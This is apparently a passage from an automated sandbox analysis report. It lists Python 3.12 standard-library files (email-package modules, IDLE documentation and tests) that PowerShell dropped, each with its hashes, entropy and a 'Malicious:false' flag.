                              Preview:.........U.f..........................J.....d.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.e.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d e.........Z...G.d!..d"e.........Z...G.d#..d$e.........Z...G.d%..d&e.........Z...G.d'..d(e.........Z...G.d)..d*e.........Z...G.d+..d,e.........Z...G.d-..d.e.........Z...G.d/..d0e.........Z...G.d1..d2e.........Z...G.d3..d4e.........Z.y5)6z email package exception classes.c...........................e.Z.d.Z.d.Z.y.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__........JC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\errors.pyr....r.................5r....r....c...........................e.Z.d.Z.d.Z.y.)...MessageParseErrorz&Bas
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):19887
                              Entropy (8bit):4.938480256659219
                              Encrypted:false
                              SSDEEP:384:sNtVXoP7tPeB3bid8HkwY++IIuzxFXZP9XDT:sNbXI2KLwY++II+FZhT
                              MD5:2642E61AA52B486D63BEEFB4590620E7
                              SHA1:A5BB177FAB543DF608CA7F6D624D023F17DDABEC
                              SHA-256:3F61D2A365D57123E2C50343A2EC0AB4D848CCE96D4BA604242042CC30E274D1
                              SHA-512:7AC85DBBDC27EF850D440BF087AB8F5398E98BA1FACB9397255027F3DE98CEEE01F471315C0696018111BC4EFADAC1B65B92A5D51A378F3637BC64AC08FDA7A4
                              Malicious:false
                              Preview:.........U.f"[........................R.....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z...e.j...................d.........Z.d.Z.d.Z...e.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z.y.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead,
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):24613
                              Entropy (8bit):5.324056612727556
                              Encrypted:false
                              SSDEEP:384:HWILAjH7z0oV85u5tzfSN1IPMp4hA/blqBFyFjZu7KfiF0AUlywc4tPFj5xjX2Pp:HWcATUy8581SEPMp4OSglu7KfIUPX2x
                              MD5:DD9488B225AB55A5CFF075CED0EFB68D
                              SHA1:56E2C8E31013EB903632E396376D19B006799E3E
                              SHA-256:40E87267B88A687A1B8124AAD483D4156487F562E11A46EEA1CC6FFB92DBCDEA
                              SHA-512:F664A526C3F58D703CA36CB5D05A4A054681871F87FD4319F325FB20E92415B2D1D43DE386A110168EF40063C2A92F5D0DC8CA16A256CD9DF168DD427CE42A0C
                              Malicious:false
                              Preview:.........U.fY`.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j...................Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.........Z...e.d.........Z...e.j*..................d.e.j,..................e.j...................z...........Z...e.j*..................d.........Z...e.j*..................d.........Z.e.j6..................j8..................Z.d...Z.....d.d...Z...G.d...d.........Z...G.d...d.........Z ..G.d...d.e!........Z"y.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?=
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2858
                              Entropy (8bit):5.4200220398411565
                              Encrypted:false
                              SSDEEP:48:qmdJ9ILiqKxHzcVsSSYBxzvfrBoHIyfnOJfMbh1FLxIeUiGnuJvjaUcYwV:7zI0/6ezOFMbhnxIYJvgV
                              MD5:FEE80B6D97576874696A43378A51DD1D
                              SHA1:1CA03669BBD9D49055E7292B5ED89B8006E21BB2
                              SHA-256:FBA652F6568E439091086A74A70C9DF5A0AD96F6750488974539EBCC458B6815
                              SHA-512:B791AF68ED2F661687E8A6BBEF996CB794A6B64EB22F726AA23194B5A0C37E711F068EAF6E2679B4AD8700FBB6803A7DE16C34DFDF35274A04F3DBC02A817603
                              Malicious:false
                              Preview:.........U.f..........................B.....d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d...Z.d.d...Z.d.d...Z.d.d...Z.y.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc................#.......K.....|.......|.j...........................r.|.j...........................D.]...}.|.j...........................E.d.{.................y.y.7.....w.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subparts.... .MC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\iterators.pyr....r........sH..............J.................'..'..)....&.G....|.|.~..%..%....&.......%.s.....;A....A....A..c................#.......K.....|.j...........................D.]8..}.|.j...................|...........}.t.........|.t.................s..&t.........|.........E.d.{..............:..y.7.....w.).z.Iterate o
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):53073
                              Entropy (8bit):5.390780772069332
                              Encrypted:false
                              SSDEEP:768:/QPmvSbfTj3cQ3iPM+jWN/Yq0HYVLvw4Mefu9eBjdgI7oCcABQqJXTREV:2AyrLkXQgp8rA9eld1ch8XT6V
                              MD5:CD0CA6BBC2366F700CF6E5BE29C94863
                              SHA1:6628A9DBC3FFF1483848D15CCD51E0E1A61BCFF5
                              SHA-256:52E8CE94F35258E01B9261B1BCB8FDE57402EA5AF486AC739E37AB7B4BA69E02
                              SHA-512:AD30A54FEF5757699F6969E99CAF94F03CF82303C96129622C9FCA32E173539E5E3F91AF7BAC6E33D7C6A4AAC86BD86EDFE791B54F2F9B57F03DAB585ACA69E2
                              Malicious:false
                              Preview:.........U.f................................d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j"..................Z.d.Z...e.j&..................d.........Z.d...Z.d.d...Z.d...Z.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c..........................t.........|.........j...................d.........\...}.}.}.|.s.|.j...........................d.f.S.|.j...........................|.j...........................f.S.).N..;)...str..partition..strip)...param..a..sep..bs.... .KC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\email\message.py.._splitparamr........sH...........E....$..$.S..).I.A.s.A.......w.w.y.$.........7.7.9.a.g.g.i...........c..........................|...t.........|.........d.k
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6785
                              Entropy (8bit):5.051004234228529
                              Encrypted:false
                              SSDEEP:96:4nVkrtgE+ueYRgfG4Pl0WjZGHMeJtp++ett+2jFZ5NlJ3yJI8:wgtgE+sRgf9aWXeJtpA+iLD33y28
                              MD5:0FFF91D7284C7DADD017489A8912601B
                              SHA1:79CA1F609C9EE49AA763C2E011FB10ADF63DC8F3
                              SHA-256:14CBD8E37020397E98A108E36CD34A35411C8F0820FC624453724F010F4382DB
                              SHA-512:10B5921257D7F19BFF27226AE8708F2130CAAE5452540AC85517F87A555BCF7539961BF085D48693BF3E2D196635C4316B6BA98FB8C66D38A7109F34A512D4B3
                              Malicious:false
                              Preview:.........U.f...............................d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z.y.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c.....................*.....e.Z.d.Z.d.e.d...d...Z.d.d...Z.d.d...Z.y.).r....N....policyc..................... .....|.|._.........|.|._.........y.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):10007
                              Entropy (8bit):5.681937295697425
                              Encrypted:false
                              SSDEEP:192:nJEGQ2S1AHLQwZzscqG2FhoPkFXShdJstHifPh:nVpjtjqv3oMFiQYf5
                              MD5:23BC68ACA7769D63A4980430C9C40893
                              SHA1:16D44FD0DA999E6CCD61547C5E7C29E2AE0173F8
                              SHA-256:5B4E1C4CA87656365432ACAC18D9F91301BA58380EA9D64B32E74ADA62FE792C
                              SHA-512:BF0B38B3BA616542FBCC991C7A665FFAE2E762EE275A7EEB46874E202ED427CA01BE0FAB87DD020B1A4E89C36093F914EBF69D96EBE58F5C57F6DBB9B5D2E2CE
                              Malicious:false
                              Preview:.........U.f.'..............................d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z...e.d.........D...c.g.c.]...}.d.|.z.........c.}.Z.e.d.d...Z.e.d.d...Z.d...e.j...................d.........z.....e.j...................d.........z...D.]...Z...e.e.........e.e.<.......d.e...e.d.........<...d.D.]...Z...e.e.........e.e.<.......d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d.d...Z.e.d.d...Z.d.D.]...Z...e.e.........e.e.<.......[.d.e.f.d...Z.e.f.d...Z.e.Z.e.Z.d...Z.d...Z y.c...c.}.w.).aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12794
                              Entropy (8bit):5.503389791847678
                              Encrypted:false
                              SSDEEP:384:mP8j8UFSwGHm+BsaSFXZMABzWzGljP0NE:mEj8UnGGqsaSXZtZDNP0e
                              MD5:13B268AF8A726770D9174D8E2086E841
                              SHA1:7366742C38B6C91A79F621BEE052EC08B7DE0B51
                              SHA-256:4DD7999A2E3E6BD45CC9205856A1BE94AF8F01E915140DCEBFF35C5071684287
                              SHA-512:515CA2869620EB955D256D72C92CE85229EF19644EC51C841F1B75E624A778A25BE1DA2E622899A0175187B565AE4F3CAA8F8CF82C92D8461DFA57DABA3E3532
                              Malicious:false
                              Preview:.........U.fe1.............................d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z...e.j2..................d.........Z...e.j2..................d.........Z.d...Z.d...Z.d d...Z.d...Z.d...Z d!d...Z!d"d...Z"d#d...Z#d...Z$d...Z%d...Z&d...Z'd#d...Z(..e.j2..................d.e.jR..........................Z*d...Z+....d$d...Z,d#d...Z-y.)%z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c.....................D.......|.j.............................y.#.t.........$.r...Y.y.w.x.Y.w.).z;Return True if s may contain surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8774
                              Entropy (8bit):4.669757481893706
                              Encrypted:false
                              SSDEEP:192:F2gPi1IygNGhdRBp8+HAe+izJkpVkgnrVeqD6kec8ZnN2ENGKTK:F2gPimygNGhjUpBVkgkqD6n9eEh+
                              MD5:DD5C15C6C8497B37895EE2DD40483EBC
                              SHA1:F6ACB572029D7CD2D41625C7F0DED5B8EB6A313D
                              SHA-256:154F585498454CA829DCD44BB89355FF8C7965B1B6692D1AC0293E7553DBBABD
                              SHA-512:140555C8F17669C2AC624E0E354021ECAA7F4F24AC6DDA3A1DD19A74371BFCC3FC0C714061362DE84EC8456ECB3381FF6C7D328C4EF25CDA3061C90EBE273324
                              Malicious:false
                              Preview:""" Routines for manipulating RFC2047 encoded words.....This is currently a package-private API, but will be considered for promotion..to a public API if there is demand....."""....# An ecoded word looks like this:..#..# =?charset[*lang]?cte?encoded_string?=..#..# for more information about charset see the charset module. Here it is one..# of the preferred MIME charset names (hopefully; you never know when parsing)...# cte (Content Transfer Encoding) is either 'q' or 'b' (ignoring case). In..# theory other letters could be used for other encodings, but in practice this..# (almost?) never happens. There could be a public API for adding entries..# to the CTE tables, but YAGNI for now. 'q' is Quoted Printable, 'b' is..# Base64. The meaning of encoded_string should be obvious. 'lang' is optional..# as indicated by the brackets (they are not part of the syntax) but is almost..# never encountered in practice...#..# The general interface for a CTE decoder is that it takes the enc
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):110266
                              Entropy (8bit):4.605221167114285
                              Encrypted:false
                              SSDEEP:1536:My6wjBQZN3oEVWnG8N8QxRarfxXu/6V7asGYDF956e:swjBMN6GNQxsSe
                              MD5:0C8E8A3013A6AB8FC70DA80C09AEBED0
                              SHA1:AEFAC48157F5272898A06FD9C1397249D7368E83
                              SHA-256:C46F702D032417BA2E51569512B7A9FBA66CF06A93A10A8B0CF6038667367D60
                              SHA-512:2302865F661F44D42AB599BD2DD208A0928F686A206C4E4C348B60A9440A116B4541BD35345558477853C2C40905FC49700EFEBE71E4F69A372BAFE19908E3B6
                              Malicious:false
                              Preview:"""Header value parser implementing various email-related RFC parsing rules.....The parsing methods defined in this module implement various email related..parsing rules. Principal among them is RFC 5322, which is the followon..to RFC 2822 and primarily a clarification of the former. It also implements..RFC 2047 encoded word decoding.....RFC 5322 goes to considerable trouble to maintain backward compatibility with..RFC 822 in the parse phase, while cleaning up the structure on the generation..phase. This parser supports correct RFC 5322 generation by tagging white space..as folding white space only when folding is allowed in the non-obsolete rule..sets. Actually, the parser is even more generous when accepting input than RFC..5322 mandates, following the spirit of Postel's Law, which RFC 5322 encourages...Where possible deviations from the standard are annotated on the 'defects'..attribute of tokens that deviate.....The general structure of the parser follows RFC 5322, and uses its
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):18378
                              Entropy (8bit):4.40867877161788
                              Encrypted:false
                              SSDEEP:192:7rjJPsgHvi2r8ISXiCvXOHjPBDtKU2U1aQQQy1leo7T/i/u6/Gkj:7rZHv5rwXiC2HDmQs1gow
                              MD5:ABB8E7D0EECA30077BEC3E11166B853D
                              SHA1:13F614028F8727728DD31E98FA628297FC38C0C0
                              SHA-256:4960C31F0039780F316149A3773367A3AEEC3BB17D360776334D9B9E688DA908
                              SHA-512:8AB6AC0C1512FFA89D68C726144E8FABBAFBA93687F27F7F8B528BD3B2F7C492235FFEC4B0A02FE74563EB15CD3740E0FBDE39271FEC7C58146EDEFE2B13DA41
                              Malicious:false
                              Preview:# Copyright (C) 2002-2007 Python Software Foundation..# Contact: email-sig@python.org...."""Email address parsing code.....Lifted directly from rfc822.py. This should eventually be rewritten..."""....__all__ = [.. 'mktime_tz',.. 'parsedate',.. 'parsedate_tz',.. 'quote',.. ]....import time, calendar....SPACE = ' '..EMPTYSTRING = ''..COMMASPACE = ', '....# Parse a date field.._monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',.. 'aug', 'sep', 'oct', 'nov', 'dec',.. 'january', 'february', 'march', 'april', 'may', 'june', 'july',.. 'august', 'september', 'october', 'november', 'december']...._daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']....# The timezone table does not include the military time zones defined..# in RFC822, other than Z. According to RFC1123, the description in..# RFC822 gets the signs wrong, so we can't rely on any such time..# zones. RFC1123 recommends that numeric timezone indicators b
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):27832
                              Entropy (8bit):4.918995851794151
                              Encrypted:false
                              SSDEEP:384:BlcJLOJej1OQLeisQqVwSjw0kA4lxVX3UQ1btugm0h+R1H8OBZ:Bqh8vnVFjlkTcKLhaHDj
                              MD5:AD6A559EEDC9B6E21491FBDFC3DF4F6E
                              SHA1:A2F2469AC92BFA4B28CE2D12ECDA298432BADA64
                              SHA-256:4F89D07CD95D20D295EDC6FEC7A3663A7E3FDE33D94D3321834F7FB673D508B8
                              SHA-512:79E6CBE9214C75A4877A1F787C8FC6333CA540855359AA2022310F183C3CDEA93050D9488B309BF6B7340F0F9E738546AF3E50CD452C66648E56D479D45DC633
                              Malicious:false
                              Preview:What's New in IDLE 2.7? (Merged into 3.1 before 2.7 release.)..=======================..*Release date: XX-XXX-2010*....- idle.py modified and simplified to better support developing experimental.. versions of IDLE which are not installed in the standard location.....- OutputWindow/PyShell right click menu "Go to file/line" wasn't working with.. file paths containing spaces. Bug 5559.....- Windows: Version string for the .chm help file changed, file not being.. accessed Patch 5783 Guilherme Polo....- Allow multiple IDLE GUI/subprocess pairs to exist simultaneously. Thanks to.. David Scherer for suggesting the use of an ephemeral port for the GUI... Patch 1529142 Weeble.....- Remove port spec from run.py and fix bug where subprocess fails to.. extract port from command line when warnings are present.....- Tk 8.5 Text widget requires 'wordprocessor' tabstyle attr to handle.. mixed space/tab properly. Issue 5129, patch by Guilherme Polo.....- Issue #3549: On MacOS the preferences
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):56880
                              Entropy (8bit):5.021179506521754
                              Encrypted:false
                              SSDEEP:768:ggcS9ItpsnixARJeJpP2ah0Rg6gTQ+EhMaQZCI2yYMDn08DQUxxe+M+T3HR:gxS6tGiOo/2q0RoQ+EhhyYWGUHvx
                              MD5:F9779662A36397178E3BBADECF0EC873
                              SHA1:7731977A4612983F81810331D76F7E9E6B4613D2
                              SHA-256:6E8E3D67E949EA99C3D7B7D388238C71F97C1D45B57D8EDDC04BF340D3936EEB
                              SHA-512:F5A836B1D311E3892E04881E0E634B1687F337681802A7951E2B4DEB3ABA89CA363BF58591BB4D4BCF413ABDA3E0064677DC96407A4FC473F9CDE4E08CD9EA73
                              Malicious:false
                              Preview:What's New in IDLE 3.12.z..(since 3.12.0)..Released after 2023-10-02..=========================......gh-96905: In idlelib code, stop redefining built-ins 'dict' and 'object'.....gh-72284: Improve the lists of features, editor key bindings,..and shell key bingings in the IDLE doc.....gh-113903: Fix rare failure of test.test_idle, in test_configdialog.....gh-113729: Fix the "Help -> IDLE Doc" menu bug in 3.11.7 and 3.12.1.....gh-57795: Enter selected text into the Find box when opening..a Replace dialog. Patch by Roger Serwy and Zackery Spytz.....gh-113269: Fix test_editor hang on macOS Catalina...Patch by Terry Reedy.....gh-112939: Fix processing unsaved files when quitting IDLE on macOS...Patch by Ronald Oussoren and Christopher Chavez.....gh-79871: Add docstrings to debugger.py. Fix two bugs in test_debugger and expand coverage by 47%. Patch by Anthony Shaw.......What's New in IDLE 3.12.0..(since 3.11.0)..Released on 2023-10-02..=========================....gh-104719: Remove IDLE'
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11943
                              Entropy (8bit):4.7961360271877
                              Encrypted:false
                              SSDEEP:192:u6CwalZFKX7zxXp50anN2LuwEj+Drd60VkfOKgvAq6rZNFUByIeONjKCWBahFPqN:u6CwwZFKX7NXpSanN2c0VkfO94/rZNFt
                              MD5:18F093967B03726CC4E2FB5404BE54A5
                              SHA1:B47040CF799FFB7AEDAC3E52A32A9F14F4E40DC2
                              SHA-256:DCD6421AE86C6A0B52BDF28F94582E2C20829F230E8D8E0E3F4B59C8D0E269ED
                              SHA-512:9BEDEE704A004A67C6735E59C0DBC75BFB258D1A58B3AB563649B7EF8668937937EFB96EB982E7B3A778D21E87706658A543EAA317BACCFFD44C4A662116C04C
                              Malicious:false
                              Preview:README.txt: an index to idlelib files and the IDLE menu.....IDLE is Python's Integrated Development and Learning..Environment. The user documentation is part of the Library Reference and..is available in IDLE by selecting Help => IDLE Help. This README documents..idlelib for IDLE developers and curious users.....IDLELIB FILES lists files alphabetically by category,..with a short description of each.....IDLE MENU show the menu tree, annotated with the module..or module object that implements the corresponding function.....This file is descriptive, not prescriptive, and may have errors..and omissions and lag behind changes in idlelib.......IDLELIB FILES..=============....Implementation files not in IDLE MENU are marked (nim).....Startup..-------..__init__.py # import, does nothing..__main__.py # -m, starts IDLE..idle.bat..idle.py..idle.pyw....Implementation..--------------..autocomplete.py # Complete attribute names or filenames...autocomplete_w.py # Display completions...autoexpan
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8688
                              Entropy (8bit):4.794943088949754
                              Encrypted:false
                              SSDEEP:96:NexsLifxJrg/vPnX6QddAWX9hghNAmgKu3czK3r69+n926zJakV+QQDoYkE7DgXM:NSy0D236+YGKEr69O9rai+IEGtVLhC
                              MD5:06B386CBB4614358099B3741402557CB
                              SHA1:3E5423A8006FE9B80F934CBA3448D42D0573398B
                              SHA-256:1887D7DF719819D8FE151B28B4B0555EA6E512F7A22DB5A113E633386C1538CB
                              SHA-512:3A544B99B9DC88EF161C3C0ED65B15742C761007EF9A753451CE045A00573DA6D68F718CE58949FEBC4C792547D244EAEA762AD70DF87EC61BFE73F5E08A7477
                              Malicious:false
                              Preview:Original IDLE todo, much of it now outdated:..============================================..TO DO:....- improve debugger:.. - manage breakpoints globally, allow bp deletion, tbreak, cbreak etc... - real object browser.. - help on how to use it (a simple help button will do wonders).. - performance? (updates of large sets of locals are slow).. - better integration of "debug module".. - debugger should be global resource (attached to flist, not to shell).. - fix the stupid bug where you need to step twice.. - display class name in stack viewer entries for methods.. - suppress tracing through IDLE internals (e.g. print) DONE.. - add a button to suppress through a specific module or class or method.. - more object inspection to stack viewer, e.g. to view all array items..- insert the initial current directory into sys.path DONE..- default directory attribute for each window instead of only for windows.. that have an associated filename..- command expansio
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):672
                              Entropy (8bit):4.5752059718793925
                              Encrypted:false
                              SSDEEP:12:T6hTmFRpHoRjrzqPpqj7ze4XjrAea2NZBhYHGvBCy02aLJv:T6kFrIAE7zlHU25Km5CQal
                              MD5:B54C65B3CB7CF1BAE767BA77EA52762B
                              SHA1:5EE8F2C7E149EC77F5D9E2A7B13800A5E645B03B
                              SHA-256:C389A44988D62D4D32438A4ACB081A40F8DCF450250D4E09651D8F7BD21455F2
                              SHA-512:1C2AE8568B5EFCDBCA517759E8F5A765CDD65B08F0018B1E9E909FC799F5B80924183E2407759C8DBD26266062677F28DDBD08C177BF0A5888626B33483A17B4
                              Malicious:false
                              Preview:"Test , coverage %."....from idlelib import zzdummy..import unittest..from test.support import requires..from tkinter import Tk......class Test(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks()..## for id in cls.root.tk.call('after', 'info'):..## cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.. self.assertTrue(True)......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11398
                              Entropy (8bit):4.608047093824536
                              Encrypted:false
                              SSDEEP:192:aQeTtOtaf/y/ULlKaga0h9Ix5NdLctLwIL0Xklk:afTtOUAU5Xga0wxRcFnE9
                              MD5:CDD4F817E9AF45EEE99560EC854BE463
                              SHA1:1E54D789E1A3523AC35DD415A04A0D54994D24B9
                              SHA-256:C6F32BC7D37B1460D136E6A974D893F4562EB2355B2CE16E6F57E7EA1E92B259
                              SHA-512:6BDC30728F80235FB938016BA6F12A41C0CA2C120732D976D0D165B8F60E1826B296FFEFA38391E57FC690F0549ECBCF5D0B9DAC6F462F1D47CAE12D23EE5330
                              Malicious:false
                              Preview:"Test autocomplete, coverage 93%."....import unittest..from unittest.mock import Mock, patch..from test.support import requires..from tkinter import Tk, Text..import os..import __main__....import idlelib.autocomplete as ac..import idlelib.autocomplete_w as acw..from idlelib.idle_test.mock_idle import Func..from idlelib.idle_test.mock_tk import Event......class DummyEditwin:.. def __init__(self, root, text):.. self.root = root.. self.text = text.. self.indentwidth = 8.. self.tabwidth = 8.. self.prompt_last_line = '>>>' # Currently not used by autocomplete.......class AutoCompleteTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.text = Text(cls.root).. cls.editor = DummyEditwin(cls.root, cls.text).... @classmethod.. def tearDownClass(cls):.. del cls.editor, cls.text.. cls.root.update_idletasks().. cls.roo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):752
                              Entropy (8bit):4.612782326521746
                              Encrypted:false
                              SSDEEP:12:PsRpHoRjrGXPmJ8Dpqj7zbYY8TETN4Xj4XiRVHGvL02aLJv:ErIBJ8Q7z98T+EMXiRVmlal
                              MD5:FFD9A24C66D7C4F486016CF002832CFC
                              SHA1:08751FFB204AFCAB5B52643BC27A45129DBDEF3C
                              SHA-256:B8D2FA36733F7C5ABFB68BBB852DB0DE27A55142DBD888EF201B41A855D5E87F
                              SHA-512:3F49A2E833CF41C77E53DC82B402265903ADB6C0A7E3C8F4ADB5A897C113E456432DE6C13E80C49517BE5AAAA40DB557E6CAC423DCBF00FA7CA664DE0D6FA980
                              Malicious:false
                              Preview:"Test autocomplete_w, coverage 11%."....import unittest..from test.support import requires..from tkinter import Tk, Text....import idlelib.autocomplete_w as acw......class AutoCompleteWindowTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.text = Text(cls.root).. cls.acw = acw.AutoCompleteWindow(cls.text, tags=None).... @classmethod.. def tearDownClass(cls):.. del cls.text, cls.acw.. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.... def test_init(self):.. self.assertEqual(self.acw.widget, self.text)......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4793
                              Entropy (8bit):4.497739044790497
                              Encrypted:false
                              SSDEEP:96:M+rIxyVSnRUC7Pr8uUlfTluZQ9oN54kjaPB4yk:t4/RUC74uUlfTlukoNKkjEB4yk
                              MD5:FF2B195CA5476B7A983410F5D47E8182
                              SHA1:F8E285F17B99AE57EB570F82F9411ECE5F67E4F8
                              SHA-256:5B6866D92D66A1F70F529BC8E32C689DFDBF39C34E8A01B546371F8D92246E07
                              SHA-512:3FD0199530257C39EAD73D0B491690AF8CC8505DE3DB47B8E923A580ABBF6FC9791A969D29C88859645A9F750BA69B7D3B4A81FA4511993D5E847D09CF90312B
                              Malicious:false
